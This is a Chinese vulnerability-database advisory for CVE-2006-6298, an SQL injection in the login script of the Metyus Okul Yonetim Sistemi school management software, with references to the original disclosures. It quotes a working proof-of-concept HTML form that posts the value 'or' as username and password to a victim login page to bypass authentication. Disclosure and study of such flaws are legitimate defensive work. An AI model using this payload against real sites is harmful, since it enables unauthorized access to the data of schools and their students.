Metyus Okul Yonetim Sistemi 'Uye_giris_islem.ASP' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111722 漏洞类型 SQL注入
发布时间 2006-12-04 更新时间 2006-12-06
CVE编号 CVE-2006-6298 CNNVD-ID CNNVD-200612-078
漏洞平台 ASP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/29220
https://cxsecurity.com/issue/WLB-2006120043
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-078
|漏洞详情
MetyusOkulYonetimSistemi中的uye_giris_islem.asp存在SQL注入漏洞,远程攻击者可以借助(1)kullanici_ismi或(2)sifre参数执行任意SQL命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/21418/info

Metyus Okul Yonetim Sistemi is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. 

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.

<title>Remote Admin Attack - LiderHack.Org // Hacking & Security PortaL</title> <center>ShaFuck31 - LiderHack.Org</center> <FORM NAME=giris ACTION="http://victim.com/[path to script]/uye_giris_islem.asp" METHOD=post> <table align=center> <td>Kullanici Adi:</td><td><INPUT NAME=kullanici_ismi class="input" value="'or'" SIZE=15></td> </tr><tr> <td>Sifre:</td><td><INPUT NAME=sifre TYPE=text class="input" value="'or'" SIZE=15></td> </tr><tr> <td align=center colspan=2><BUTTON class="input" TYPE=submit>Giris</BUTTON></td> </tr></table></form>
|参考资料

来源:BID
名称:21418
链接:http://www.securityfocus.com/bid/21418
来源:BUGTRAQ
名称:20061202MetyusOkulYönetimSistemiV.1.0(tr)SqlinjectionVuln.
链接:http://www.securityfocus.com/archive/1/archive/1/453419/100/0/threaded
来源:XF
名称:moys-uyegirisislem-sql-injection(30705)
链接:http://xforce.iss.net/xforce/xfdb/30705
来源:SREASON
名称:1971
链接:http://securityreason.com/securityalert/1971